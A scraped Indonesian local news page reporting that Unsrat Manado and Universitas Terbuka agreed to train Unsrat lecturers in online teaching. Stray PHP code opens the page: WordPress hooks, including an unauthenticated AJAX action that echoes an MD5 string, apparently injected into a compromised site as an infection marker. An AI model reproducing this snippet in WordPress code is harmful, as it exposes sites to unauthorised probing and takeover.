function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); 1.500 Tenaga Pendidik Unsrat Bakal Ikuti TOT Secara Bertahap – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 23 Sep 2022 22:29 WIB ·

1.500 Tenaga Pendidik Unsrat Bakal Ikuti TOT Secara Bertahap


					1.500 Tenaga Pendidik Unsrat Bakal Ikuti TOT Secara Bertahap Perbesar

MANADO – Universitas Sam Ratulangi (Unsrat) Manado menggandeng Universitas Terbuka (UT) dalam meningkatkan kemampuan dosennya.

Tercatat, dari 1.500 pendidik di Unsat, sekitar 30 persen yang akan diikutsertakan dalam Training Of Trainer (TOT) kemampuan dosen secara bertahap.

Wakil Rektor Bidang Perencanaan, Penganggaran, dan Kerja sama Unsrat Manado Prof. Dr. Ir. Sangkertadi, DEA., mengungkapkan angka 30 persen sudah sangat baik untuk suatu perguruan tinggi. Itu artinya, dalam 3-4 tahun ke depan akan dihasilkan 450 dosen Unsrat yang punya kemampuan di bidang pembelajaran online.

“Universitas Terbuka sebagai leader-nya pendidikan jarak jauh (PJJ) menjadi salah satu latar belakang kami bekerja sama dengan UT,” kata Profesor Sangkertadi seusai penandatanganan kerja sama (PKS) dengan Universitas Terbuka di Pondok Cabe, Tangerang Selatan, Jumat (23/9).

Dia memaparkan Unsrat dan UT sebenarnya sudah lama melakukan MoU. Nah, kali ini ditindaklanjuti dengan PKS.

Pada kesempatan sama, Wakil Rektor Bidang Pengembangan Institusi dan Kerja Sama Universitas Terbuka Rahmat Budiman, S.S., M.Hum., Ph.D., mengungkapkan PKS ini fokus pada TOT kemampuan dosen dalam desain dan pengembangan program pembelajaran di Unsrat Manado tahun 2022.

“Kami berharap lewat PKS ini ada simbiosis mutualisme, sama-sama saling mendukung, mengisi, dan akhirnya maju bersama,” ujar Rahmat.

Dia mengatakan UT akan mengindentifikasi prodi mana yang bisa dijajaki bersama dalam TOT. Rahmat juga sepakat dengan Prof. Sangkertadi yang mengusulkan untuk mengeksplor kegiatan penelitian dan pengabdian masyarakat.

“Selama ini kerja sama hanya fokus pada pembelajaran, kegiatan lain seperti penelitian dan pengabdian masyarakat belum dieksplorasi. Usulan tersebut sangat menarik,” terang  Rahmat.

Menurut Rahmat, sebagai perguruan tinggi negeri yang menerapkan sistem PJJ, Universitas Terbuka menjangkau hingga ke pelosok negeri. UT memiliki kantor wilayah untuk menjangkau pelayanan pendidikan ke seluruh penjuru tanah air.

Saat ini tercatat ada 39 Unit Program Belajar Jarak Jauh (UPBJJ). Memiliki jangkauan luas di berbagai daerah, penting bagi UT untuk menjalin kerja sama yang baik dengan berbagai instansi. Salah satunya dengan Unsrat Manado sebagai mitra perguruan tinggi.

Salah satu keunggulan UT adalah perguruan tinggi benchmark baik dengan instansi dalam maupun luar negeri.

Artikel ini telah dibaca 9 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized